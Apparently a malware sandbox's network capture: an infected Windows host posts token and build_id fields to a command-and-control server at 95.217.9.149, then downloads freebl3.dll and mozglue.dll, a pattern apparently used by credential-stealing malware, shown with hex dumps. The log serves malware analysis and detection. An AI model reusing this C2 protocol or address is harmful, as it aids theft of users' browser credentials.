2024-04-23 23:44:45 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 Data Ascii: Vt$W\|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
2024-04-23 23:44:45 UTC	16384	IN	Data Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$L$J_
2024-04-23 23:44:45 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:44:48 UTC	262	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCB User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 23:44:48 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 63 61 39 32 30 39 62 61 63 34 34 35 61 34 31 39 64 34 61 36 35 65 61 38 64 34 62 64 34 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 37 30 36 64 63 36 63 39 32 30 32 34 33 30 62 63 36 66 62 32 65 37 34 38 39 36 64 38 33 31 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="token"86ca9209bac445a419d4a65ea8d4bd41------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="build_id"1706dc6c9202430bc6fb2e74896d8311------AEBAFBGIDHCBFHIECFCBCont
2024-04-23 23:44:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 23:44:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 23:44:49 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:44:50 UTC	261	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGDBFBFCBFBKECAAKJKF User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 23:44:50 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 63 61 39 32 30 39 62 61 63 34 34 35 61 34 31 39 64 34 61 36 35 65 61 38 64 34 62 64 34 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 37 30 36 64 63 36 63 39 32 30 32 34 33 30 62 63 36 66 62 32 65 37 34 38 39 36 64 38 33 31 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------DGDBFBFCBFBKECAAKJKFContent-Disposition: form-data; name="token"86ca9209bac445a419d4a65ea8d4bd41------DGDBFBFCBFBKECAAKJKFContent-Disposition: form-data; name="build_id"1706dc6c9202430bc6fb2e74896d8311------DGDBFBFCBFBKECAAKJKFCont
2024-04-23 23:44:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 23:44:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 23:44:51 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:44:54 UTC	156	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Cache-Control: no-cache
2024-04-23 23:44:55 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 23:44:54 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-a7550" Accept-Ranges: bytes
2024-04-23 23:44:55 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-04-23 23:44:55 UTC	16384	IN	Data Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b Data Ascii: }1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x]E0
2024-04-23 23:44:55 UTC	16384	IN	Data Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90 Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
2024-04-23 23:44:55 UTC	16384	IN	Data Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
2024-04-23 23:44:56 UTC	16384	IN	Data Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
2024-04-23 23:44:56 UTC	16384	IN	Data Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0 Data Ascii: }EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w w1
2024-04-23 23:44:56 UTC	16384	IN	Data Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE\|l
2024-04-23 23:44:56 UTC	16384	IN	Data Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
2024-04-23 23:44:56 UTC	16384	IN	Data Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
2024-04-23 23:44:56 UTC	16384	IN	Data Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff Data Ascii: 0<48%8A)$(

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:44:57 UTC	156	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Cache-Control: no-cache
2024-04-23 23:44:58 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 23:44:58 GMT Content-Type: application/octet-stream Content-Length: 608080 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-94750" Accept-Ranges: bytes
2024-04-23 23:44:58 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-04-23 23:44:58 UTC	16384	IN	Data Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46 Data Ascii: A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNPFLFPF
2024-04-23 23:44:59 UTC	16384	IN	Data Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1 Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
2024-04-23 23:44:59 UTC	16384	IN	Data Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}LQ
2024-04-23 23:44:59 UTC	16384	IN	Data Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 